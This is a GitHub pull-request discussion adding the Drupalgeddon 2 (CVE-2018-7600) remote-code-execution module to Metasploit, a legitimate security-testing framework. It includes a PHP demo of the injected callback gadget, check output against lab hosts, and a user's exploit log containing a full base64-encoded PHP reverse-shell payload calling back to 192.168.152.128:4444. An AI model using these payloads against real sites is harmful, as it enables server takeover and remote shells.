Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add Drupal Drupalgeddon 2 #9876

Merged
merged 26 commits into from
Apr 25, 2018
Merged

Add Drupal Drupalgeddon 2 #9876

merged 26 commits into from
Apr 25, 2018

Conversation

wvu
Copy link
Contributor

@wvu wvu commented Apr 13, 2018
edited
Loading 

msf5 exploit(unix/webapp/drupal_drupalgeddon2) > info

       Name: Drupal Drupalgeddon 2 Forms API Property Injection
     Module: exploit/unix/webapp/drupal_drupalgeddon2
   Platform: PHP, Unix, Linux
       Arch: php, cmd, x86, x64
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2018-03-28

Provided by:
  Jasper Mattsson
  a2u
  Nixawk
  FireFart
  wvu <wvu@metasploit.com>

Available targets:
  Id  Name
  --  ----
  0   Automatic (PHP In-Memory)
  1   Automatic (PHP Dropper)
  2   Automatic (Unix In-Memory)
  3   Automatic (Linux Dropper)
  4   Drupal 7.x (PHP In-Memory)
  5   Drupal 7.x (PHP Dropper)
  6   Drupal 7.x (Unix In-Memory)
  7   Drupal 7.x (Linux Dropper)
  8   Drupal 8.x (PHP In-Memory)
  9   Drupal 8.x (PHP Dropper)
  10  Drupal 8.x (Unix In-Memory)
  11  Drupal 8.x (Linux Dropper)

Basic options:
  Name         Current Setting  Required  Description
  ----         ---------------  --------  -----------
  DUMP_OUTPUT  false            no        If output should be dumped
  PHP_FUNC     passthru         yes       PHP function to execute
  Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST                         yes       The target address
  RPORT        80               yes       The target port (TCP)
  SSL          false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI    /                yes       Path to Drupal install
  VHOST                         no        HTTP server virtual host

Payload information:
  Avoid: 3 characters

Description:
  This module exploits a Drupal property injection in the Forms API.
  Drupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, and < 8.5.1 are
  vulnerable.

References:
  https://cvedetails.com/cve/CVE-2018-7600/
  https://www.drupal.org/sa-core-2018-002
  https://greysec.net/showthread.php?tid=2912
  https://research.checkpoint.com/uncovering-drupalgeddon-2/
  https://github.com/a2u/CVE-2018-7600
  https://github.com/nixawk/labs/issues/19
  https://github.com/FireFart/CVE-2018-7600
  Also known as: SA-CORE-2018-002
  Also known as: Drupalgeddon 2

msf5 exploit(unix/webapp/drupal_drupalgeddon2) >

Resolves #9789.

@wvu wvu added module hotness Something we're really excited about blocked Blocked by one or more additional tasks feature labels Apr 13, 2018
@wvu wvu force-pushed the feature/drupal branch 11 times, most recently from 3897d04 to 50f8058 Compare April 14, 2018 00:25
@wvu wvu added the needs-docs label Apr 14, 2018
@wvu wvu force-pushed the feature/drupal branch 11 times, most recently from bced7e2 to 6838a4e Compare April 14, 2018 05:13
@nixawk
Copy link
Contributor

nixawk commented Apr 14, 2018

A php demo is prepared for exp tests. It shows how to exploit CVE-2018-7600.

root@lab:~# php /tmp/bug.php passthru id
PHP Warning:  Parameter 2 to passthru() expected to be a reference, value given in /tmp/bug.php on line 38
PHP Stack trace:
PHP   1. {main}() /tmp/bug.php:0
PHP   2. drupal_cve_2018_7600() /tmp/bug.php:45
uid=0(root) gid=0(root) groups=0(root)


root@lab:~# php /tmp/bug.php printf drupal
drupal6


<?php

// Author: Nixawk
// CVE-2018-7600: Unsanitized requests allow remote attackers to execute arbitrary code

// Usage:
// $ php drupal-rce-php.php passthru id

function drupal_cve_2018_7600($func, $param)
{
    $elements = array(
        "#markup" => "{Drupal\Core\Render\Markup}",
        "#type"   => "markup",
        "#post_render" => array(
        0 => $func
        ),
        "#suffix" => "<span class=\"ajax-new-content\"></span>",
        "#prefix" => "",
        "#cache"  => array(
            "contexts" => array(
            0 => "languages:language_intreface",
            1 => "theme",
            2 => "user.permissions"
            ),
            "tags" => array(),
        "max-age" => -1
        ),
        "#defaults_loaded" => true,
        "#attached" => array(),
        "#children" => array(
          "string" => $param
        )
    );

    // echo $elements['#children']["string"] . "\n";

    $elements['#children']["string"] = call_user_func(
        // $callable = $elements["#post_render"]["0"];
        $elements["#post_render"]["0"],
        $elements['#children']["string"], 
        $elements
    );

    echo $elements['#children']["string"] . "\n";

}

drupal_cve_2018_7600($argv[1], $argv[2]);

?>

@alfonsocaponi
Copy link

msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set TARGETURI /drupal
TARGETURI => /drupal
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > check

[-] Could not determine Drupal version to target
[*] 192.168.253.129:80 Cannot reliably check exploitability.
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set TARGETURI /drupal/
TARGETURI => /drupal/
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > check

[*] Drupal 7.x targeted at http://192.168.253.129/drupal/
[+] Drupal appears unpatched in CHANGELOG.txt
[+] 192.168.253.129:80 The target is vulnerable.

@bcoles
Copy link
Contributor

bcoles commented Apr 26, 2018

@alfonsocaponi that makes sense. At a guess, /drupal is returning a 302 redirect to /drupal/.

check does not follow redirects.

@alfonsocaponi
Copy link

@bcoles according to you, it could be useful add an option about redirect? :)

msjenkins-r7 pushed a commit that referenced this pull request Apr 26, 2018
@busterb @msjenkins-r7
Land #9876, Drupalgeddon 2
d340ef2
msjenkins-r7 pushed a commit that referenced this pull request Apr 26, 2018
@wvu @msjenkins-r7
Land #9931, minor fixes for #9876 (Drupalgeddon 2)
492b600
@wvu
Copy link
Contributor Author

wvu commented Apr 26, 2018

@alfonsocaponi: Happy to make the change.

@wvu
Copy link
Contributor Author

wvu commented Apr 26, 2018

Hmm, it'll be more complicated than that. Reactively writing in send_request_cgi! is not a practice I want to perpetuate. I'm investigating a better way.

wvu added a commit to wvu/metasploit-framework that referenced this pull request May 3, 2018
@wvu
Fix rapid7#9876, second round of Drupalgeddon 2 updates
16ea835 
Thanks to a reviewer for noticing my drupal_unpatched? method was
tri-state because of an unrefactored return. Oops! :)
wvu added a commit to wvu/metasploit-framework that referenced this pull request May 3, 2018
@wvu
Fix rapid7#9876, second round of Drupalgeddon 2 updates
70ae145 
Thanks to a reviewer for noticing my drupal_unpatched? method was
tri-state because of an unrefactored return. Oops! :)
wvu added a commit to wvu/metasploit-framework that referenced this pull request May 3, 2018
@wvu
Fix rapid7#9876, second round of Drupalgeddon 2 updates
075f7c8 
Thanks to a reviewer for noticing my drupal_unpatched? method was
tri-state because of an unrefactored return. Oops! :)
wvu added a commit to wvu/metasploit-framework that referenced this pull request May 3, 2018
@wvu
Fix rapid7#9876, second round of Drupalgeddon 2 updates
ec8a0b9 
Thanks to a reviewer for noticing my drupal_unpatched? method was
tri-state because of an unrefactored return. Oops! :)
wvu added a commit to wvu/metasploit-framework that referenced this pull request May 3, 2018
@wvu
Fix rapid7#9876, second round of Drupalgeddon 2 updates
6471a49 
Thanks to a reviewer for noticing my drupal_unpatched? method was
tri-state because of an unrefactored return. Oops! :)
wvu added a commit to wvu/metasploit-framework that referenced this pull request May 3, 2018
@wvu
Fix rapid7#9876, second round of Drupalgeddon 2 updates
6cab482 
Thanks to a reviewer for noticing my drupal_unpatched? method was
tri-state because of an unrefactored return. Oops! :)
@wvu
Copy link
Contributor Author

wvu commented May 3, 2018

Bah, it's catching my rebases. It's always a mistake to reference a PR in a commit. :/

wvu added a commit to wvu/metasploit-framework that referenced this pull request May 3, 2018
@wvu
Fix rapid7#9876, second round of Drupalgeddon 2 updates
0027ee6 
Thanks to a reviewer for noticing my drupal_unpatched? method was
tri-state because of an unrefactored return. Oops! :)
@wvu wvu mentioned this pull request May 3, 2018
Merged
wvu added a commit to wvu/metasploit-framework that referenced this pull request May 3, 2018
@wvu
Fix rapid7#9876, second round of Drupalgeddon 2 updates
9e05855 
Thanks to a reviewer for noticing my drupal_unpatched? method was
tri-state because of an unrefactored return. Oops! :)
wvu added a commit to wvu/metasploit-framework that referenced this pull request May 3, 2018
@wvu
Fix rapid7#9876, second round of Drupalgeddon 2 updates
728d7bc 
Thanks to a reviewer for noticing my drupal_unpatched? method was
tri-state because of an unrefactored return. Oops! :)
@wvu
Copy link
Contributor Author

wvu commented May 3, 2018

@alfonsocaponi: See if the latest code works for you. Thanks.

@wvu wvu mentioned this pull request May 3, 2018
Merged
@wvu
Copy link
Contributor Author

wvu commented May 3, 2018

All right, I've committed what I hope to be my final revision to the module. Happy hunting. Bug reports welcome.

@user124567
Copy link

Hi - I have been trying to exploit a Raspbian/LAMP/Drupal8.5.0 install without success - any ideas why? Below is the output - thanks for any help!

[] Started reverse TCP handler on 192.168.152.128:4444
[] Drupal 8 targeted at http://192.168.1.104/drupal/
[+] Drupal appears unpatched in CHANGELOG.txt
[] Executing with printf(): 8237hWucIsyWIFYCWi8sDn9eRbsTlaOK2r
[] Executing with assert(): eval(base64_decode(Lyo8P3BocCAvKiovIGVycm9yX3JlcG9ydGluZygwKTsgJGlwID0gJzE5Mi4xNjguMTUyLjEyOCc7ICRwb3J0ID0gNDQ0NDsgaWYgKCgkZiA9ICdzdHJlYW1fc29ja2V0X2NsaWVudCcpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKCJ0Y3A6Ly97JGlwfTp7JHBvcnR9Iik7ICRzX3R5cGUgPSAnc3RyZWFtJzsgfSBpZiAoISRzICYmICgkZiA9ICdmc29ja29wZW4nKSAmJiBpc19jYWxsYWJsZSgkZikpIHsgJHMgPSAkZigkaXAsICRwb3J0KTsgJHNfdHlwZSA9ICdzdHJlYW0nOyB9IGlmICghJHMgJiYgKCRmID0gJ3NvY2tldF9jcmVhdGUnKSAmJiBpc19jYWxsYWJsZSgkZikpIHsgJHMgPSAkZihBRl9JTkVULCBTT0NLX1NUUkVBTSwgU09MX1RDUCk7ICRyZXMgPSBAc29ja2V0X2Nvbm5lY3QoJHMsICRpcCwgJHBvcnQpOyBpZiAoISRyZXMpIHsgZGllKCk7IH0gJHNfdHlwZSA9ICdzb2NrZXQnOyB9IGlmICghJHNfdHlwZSkgeyBkaWUoJ25vIHNvY2tldCBmdW5jcycpOyB9IGlmICghJHMpIHsgZGllKCdubyBzb2NrZXQnKTsgfSBzd2l0Y2ggKCRzX3R5cGUpIHsgY2FzZSAnc3RyZWFtJzogJGxlbiA9IGZyZWFkKCRzLCA0KTsgYnJlYWs7IGNhc2UgJ3NvY2tldCc6ICRsZW4gPSBzb2NrZXRfcmVhZCgkcywgNCk7IGJyZWFrOyB9IGlmICghJGxlbikgeyBkaWUoKTsgfSAkYSA9IHVucGFj.aygiTmxlbiIsICRsZW4pOyAkbGVuID0gJGFbJ2xlbiddOyAkYiA9ICcnOyB3aGlsZSAoc3RybGVuKCRiKSA8ICRsZW4pIHsgc3dpdGNoICgkc190eXBlKSB7IGNhc2UgJ3N0cmVhbSc6ICRiIC49IGZyZWFkKCRzLCAkbGVuLXN0cmxlbigkYikpOyBicmVhazsgY2FzZSAnc29ja2V0JzogJGIgLj0gc29ja2V0X3JlYWQoJHMsICRsZW4tc3RybGVuKCRiKSk7IGJyZWFrOyB9IH0gJEdMT0JBTFNbJ21zZ3NvY2snXSA9ICRzOyAkR0xPQkFMU1snbXNnc29ja190eXBlJ10gPSAkc190eXBlOyBpZiAoZXh0ZW5zaW9uX2xvYWRlZCgnc3Vob3NpbicpICYmIGluaV9nZXQoJ3N1aG9zaW4uZXhlY3V0b3IuZGlzYWJsZV9ldmFsJykpIHsgJHN1aG9zaW5fYnlwYXNzPWNyZWF0ZV9mdW5jdGlvbignJywgJGIpOyAkc3Vob3Npbl9ieXBhc3MoKTsgfSBlbHNlIHsgZXZhbCgkYik7IH0gZGllKCk7));
[] Executing with passthru(): php -r 'eval(base64_decode(Lyo8P3BocCAvKiovIGVycm9yX3JlcG9ydGluZygwKTsgJGlwID0gJzE5Mi4xNjguMTUyLjEyOCc7ICRwb3J0ID0gNDQ0NDsgaWYgKCgkZiA9ICdzdHJlYW1fc29ja2V0X2NsaWVudCcpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKCJ0Y3A6Ly97JGlwfTp7JHBvcnR9Iik7ICRzX3R5cGUgPSAnc3RyZWFtJzsgfSBpZiAoISRzICYmICgkZiA9ICdmc29ja29wZW4nKSAmJiBpc19jYWxsYWJsZSgkZikpIHsgJHMgPSAkZigkaXAsICRwb3J0KTsgJHNfdHlwZSA9ICdzdHJlYW0nOyB9IGlmICghJHMgJiYgKCRmID0gJ3NvY2tldF9jcmVhdGUnKSAmJiBpc19jYWxsYWJsZSgkZikpIHsgJHMgPSAkZihBRl9JTkVULCBTT0NLX1NUUkVBTSwgU09MX1RDUCk7ICRyZXMgPSBAc29ja2V0X2Nvbm5lY3QoJHMsICRpcCwgJHBvcnQpOyBpZiAoISRyZXMpIHsgZGllKCk7IH0gJHNfdHlwZSA9ICdzb2NrZXQnOyB9IGlmICghJHNfdHlwZSkgeyBkaWUoJ25vIHNvY2tldCBmdW5jcycpOyB9IGlmICghJHMpIHsgZGllKCdubyBzb2NrZXQnKTsgfSBzd2l0Y2ggKCRzX3R5cGUpIHsgY2FzZSAnc3RyZWFtJzogJGxlbiA9IGZyZWFkKCRzLCA0KTsgYnJlYWs7IGNhc2UgJ3NvY2tldCc6ICRsZW4gPSBzb2NrZXRfcmVhZCgkcywgNCk7IGJyZWFrOyB9IGlmICghJGxlbikgeyBkaWUoKTsgfSAkYSA9IHVucGFj.aygiTmxlbiIsICRsZW4pOyAkbGVuID0gJGFbJ2xlbiddOyAkYiA9ICcnOyB3aGlsZSAoc3RybGVuKCRiKSA8ICRsZW4pIHsgc3dpdGNoICgkc190eXBlKSB7IGNhc2UgJ3N0cmVhbSc6ICRiIC49IGZyZWFkKCRzLCAkbGVuLXN0cmxlbigkYikpOyBicmVhazsgY2FzZSAnc29ja2V0JzogJGIgLj0gc29ja2V0X3JlYWQoJHMsICRsZW4tc3RybGVuKCRiKSk7IGJyZWFrOyB9IH0gJEdMT0JBTFNbJ21zZ3NvY2snXSA9ICRzOyAkR0xPQkFMU1snbXNnc29ja190eXBlJ10gPSAkc190eXBlOyBpZiAoZXh0ZW5zaW9uX2xvYWRlZCgnc3Vob3NpbicpICYmIGluaV9nZXQoJ3N1aG9zaW4uZXhlY3V0b3IuZGlzYWJsZV9ldmFsJykpIHsgJHN1aG9zaW5fYnlwYXNzPWNyZWF0ZV9mdW5jdGlvbignJywgJGIpOyAkc3Vob3Npbl9ieXBhc3MoKTsgfSBlbHNlIHsgZXZhbCgkYik7IH0gZGllKCk7));'
[] Exploit completed, but no session was created.
msf exploit(unix/webapp/drupal_drupalgeddon2) > check

[] Drupal 8 targeted at http://192.168.1.104/drupal/
[+] Drupal appears unpatched in CHANGELOG.txt
[] Executing with printf(): 8sU6NkT0h7ZMtNZa6cbk1P1EARQFWROBfg0W6re
[+] 192.168.1.104:80 The target is vulnerable.

@wvu
Copy link
Contributor Author

wvu commented Jun 3, 2018

@user124567: Are you sure your payload settings are correct? The payload can connect back? Also, it's possible there's no PHP CLI, or perhaps passthru() was disabled (you can change the PHP_FUNC option). Clearly assert() did not work. I suggest giving cmd/unix/generic a try and seeing if you can get shell output.

@user124567
Copy link

Thanks for taking the time to reply, have checked PHP CLI is installed and passthru is enabled, cmd/unix/generic doesn't run (not a compatible payload) but I tried all the available options without success as well, also with php_func = exec

I have the exploit running well against an intel cpu install we have but not the RaspberryPi install - again grateful for any suggestions - thanks

@wvu
Copy link
Contributor Author

wvu commented Jun 4, 2018

If cmd/unix/generic is not a compatible payload, your target is wrong. Select a Unix In-Memory target. Btw, if you have a bug, don't comment on the PR: create a new issue. If you require support, please ask us on IRC or via e-mail (msfdev@metasploit.com works).

@wvu
Copy link
Contributor Author

wvu commented Jun 4, 2018

Happy to wrap up debugging this with you here, though. :)

@wvu
Copy link
Contributor Author

wvu commented Jun 4, 2018

Next thing I would suggest is using strace to verify command injection is possible. I'd give your php.ini a once-over, too.

@wvu wvu mentioned this pull request Jul 5, 2018
Merged
6 tasks
@rotemreiss rotemreiss mentioned this pull request Mar 5, 2019
Merged
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@firefart firefart firefart left review comments

@h00die h00die h00die left review comments

@nixawk nixawk nixawk left review comments

@AgoraSecurity AgoraSecurity AgoraSecurity left review comments

Assignees

@busterb busterb

Labels
feature hotness Something we're really excited about module
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

CVE-2018-7600 (Drupalgedon2)